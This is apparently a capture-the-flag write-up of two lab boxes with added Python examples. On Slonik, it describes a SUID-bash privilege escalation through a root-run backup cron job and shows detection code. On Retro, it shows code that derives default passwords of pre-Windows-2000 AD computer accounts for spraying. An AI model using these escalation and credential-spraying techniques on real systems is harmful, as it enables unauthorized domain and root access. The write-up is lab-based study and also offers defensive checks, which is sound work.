Slonik (Linux Medium)
Slonik is a Linux box built around reusing a Unix socket and forwarding it over SSH. It starts with a host running NFS; showmount lists two exports, /var/backups and /home. /home is the interesting one: it contains a .bash_history and a .psql_history, which show the commands that were previously run. rpcinfo shows which RPC services and sockets are in use. With that information we create a directory /tmp/sock and use it together with the trailing PID seen in .bash_history. Over ssh we can then connect through the socket created by postgres. Once connected, we get a reverse shell using a PoC from HackTricks. With a shell, pspy64 shows a cron job running the script /usr/bin/backup, which backs up everything in the postgres HOME directory. We copy /usr/bin/bash into that home directory, make it executable and set the setuid bit (chmod u+s; the sticky bit does nothing useful on a file). Because the backup job runs from cron as root and preserves file modes, the backed-up copy is a root-owned SUID bash; run it with bash -p so bash keeps the elevated effective UID, and we have root.
Initial Nmap
PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 63
111/tcp ...
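The privilege escalation above rests on one property of the backup job: it copies files as root and keeps their mode bits, so a user-planted SUID bash comes out of the backup root-owned. The following added example (written for this page, not code from the Slonik writeup or the box itself) reproduces that in a constructed temporary tree: it plants a fake "bash" with chmod u+s, backs it up naively with shutil.copy2 (which preserves setuid), backs it up again while stripping setuid/setgid, and sweeps each tree with a small detector that lists set-id files not in an allow-list. Paths, file names and the stand-in script body are all constructed for the demo.

```python
import os
import shutil
import stat
import tempfile

SETID_BITS = stat.S_ISUID | stat.S_ISGID


def find_setuid(root, baseline=()):
    """Return (path, owner_uid, mode) for every regular file under `root` that
    has the setuid or setgid bit and is not in `baseline` (known-good paths).
    Symlinks are not followed, so a link to a legitimate SUID binary is not reported."""
    known = {os.path.realpath(p) for p in baseline}
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the sweep
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & SETID_BITS):
                continue
            real = os.path.realpath(path)
            if real not in known:
                hits.append((real, st.st_uid, stat.S_IMODE(st.st_mode)))
    return sorted(hits)


def backup_tree(src, dst, strip_setid=True):
    """Copy `src` to `dst` the way a naive backup job would.  shutil.copy2 keeps
    mode bits, setuid included; with strip_setid=False the copy keeps them, which
    is what a root-run backup hands an attacker.  The default clears the bits on
    every copied file, which is the cheap fix for a job like /usr/bin/backup."""
    for dirpath, _dirs, files in os.walk(src):
        out_dir = os.path.join(dst, os.path.relpath(dirpath, src))
        os.makedirs(out_dir, exist_ok=True)
        for name in files:
            target = os.path.join(out_dir, name)
            shutil.copy2(os.path.join(dirpath, name), target)
            if strip_setid:
                mode = stat.S_IMODE(os.lstat(target).st_mode)
                os.chmod(target, mode & ~SETID_BITS)
    return dst


def demo():
    """Constructed scenario (hypothetical paths): a stand-in for bash dropped into
    a home directory with chmod u+s, then backed up naively and safely.  Returns
    the set-id files found in the home tree, the naive copy and the hardened copy."""
    work = tempfile.mkdtemp(prefix="slonik-demo-")
    home = os.path.join(work, "home", "postgres")
    os.makedirs(home)
    planted = os.path.join(home, "bash")
    with open(planted, "wb") as fh:
        fh.write(b"#!/bin/sh\n")  # stands in for a copy of /usr/bin/bash
    os.chmod(planted, 0o4755)     # what `chmod u+s` leaves behind
    naive = backup_tree(home, os.path.join(work, "backup-naive"), strip_setid=False)
    safe = backup_tree(home, os.path.join(work, "backup-safe"))
    result = {
        "home": [p for p, _uid, _mode in find_setuid(home)],
        "naive": [p for p, _uid, _mode in find_setuid(naive)],
        "safe": [p for p, _uid, _mode in find_setuid(safe)],
    }
    shutil.rmtree(work)
    return result


if __name__ == "__main__":
    for tree, paths in demo().items():
        print(f"{tree}: {paths or 'no set-id files'}")
```

On the real box the owner of the planted file only changes because root performs the copy; in this demo everything is owned by the running user, so the point it makes is about the mode bits surviving the copy, which is exactly what the detector keys on. Run find_setuid over /home and /var/backups with a baseline of the distribution's known SUID binaries to spot this trick after the fact.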
Retro (Windows Easy)
Retro is an Easy Windows box built around pre-created computer accounts. Pre-creating a computer means adding a computer object to AD without immediately using it to join a host to the domain; it gets used later. When creating a computer in ADUC there is a "Pre-Windows 2000" compatibility option ("Assign this computer account as a pre-Windows 2000 computer"), still present in Windows Server 2022. A computer created with this option has a password equal to the computer's name in lowercase without the trailing '$'. Authenticating with that account lets you enumerate the ADCS certificate templates in use and find a vulnerable one, which leads to privilege escalation to Administrator. Resource from Medium
Initial Nmap
# Nmap 7.94SVN scan initiated Wed Nov 6 22:09:30 2024 as: /usr/lib/nmap/nmap -v -sVC -oN Evidence/Scans/initial.log 10.10.111.122
Nmap scan report for 10.10.111.122
Host is up (0.17s...
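The pre-Windows 2000 default password is easy to state, but the useful part is picking the right accounts out of a domain dump: ADUC writes userAccountControl 4128 (WORKSTATION_TRUST_ACCOUNT 0x1000 plus PASSWD_NOTREQD 0x0020) for these objects, and an account that was later joined will have logged on and been re-keyed, so logonCount 0 separates live candidates from stale flags. The following added example (written for this page, not code from the Retro writeup or any tool it uses) applies that filter to LDAP-style records and derives the (account, password) pairs to spray. The records, host names and the exact LDAP filter string are constructed assumptions for the demo.

```python
"""Find pre-Windows 2000 computer accounts and derive their default password."""

# userAccountControl flag bits (MS-SAMR / MS-ADTS).
UF_PASSWD_NOTREQD = 0x0020
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000

# The combination ADUC writes for a pre-Windows 2000 computer: 0x1020 == 4128.
PRE2000_UAC = UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD

# LDAP filter you would run against the DC to pull candidates (assumed shape);
# logonCount=0 drops accounts that have since been joined and re-keyed.
LDAP_FILTER = "(&(objectClass=computer)(userAccountControl=4128)(logonCount=0))"


def pre2000_password(sam_account_name):
    """Default password of a pre-Windows 2000 computer account: the computer
    name, lower-cased, without the trailing '$'."""
    name = sam_account_name.strip()
    if name.endswith("$"):
        name = name[:-1]
    return name.lower()


def is_pre2000_candidate(record):
    """True when userAccountControl carries both WORKSTATION_TRUST_ACCOUNT and
    PASSWD_NOTREQD and the account has never logged on."""
    uac = int(record.get("userAccountControl", 0))
    never_used = int(record.get("logonCount", 0)) == 0
    return (uac & PRE2000_UAC) == PRE2000_UAC and never_used


def candidate_credentials(records):
    """(sAMAccountName, password) pairs ready for a spray, from LDAP-style records."""
    return [(r["sAMAccountName"], pre2000_password(r["sAMAccountName"]))
            for r in records if is_pre2000_candidate(r)]


# Constructed records mimicking an LDAP dump of computer objects; not from the box.
SAMPLE_RECORDS = [
    {"sAMAccountName": "RETRO-WS01$", "userAccountControl": 4128, "logonCount": 0},
    {"sAMAccountName": "FILESRV01$", "userAccountControl": 4096, "logonCount": 412},
    {"sAMAccountName": "OLDPC$", "userAccountControl": 4128, "logonCount": 7},
    {"sAMAccountName": "DC01$", "userAccountControl": 532480, "logonCount": 9000},
]

if __name__ == "__main__":
    print("filter:", LDAP_FILTER)
    for sam, pw in candidate_credentials(SAMPLE_RECORDS):
        print(f"{sam} -> {pw}")
```

Two practitioner notes. On the offensive side, a correct pre-2000 password often does not give a clean NTLM logon: SMB answers STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT rather than STATUS_LOGON_FAILURE, which confirms the password, after which you change it (impacket's changepasswd.py or kpasswd) or authenticate with Kerberos before going after the ADCS templates. On the defensive side, the same UAC 4128 plus logonCount 0 query is a cheap hunt for stale pre-created computers that should be deleted or re-keyed.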


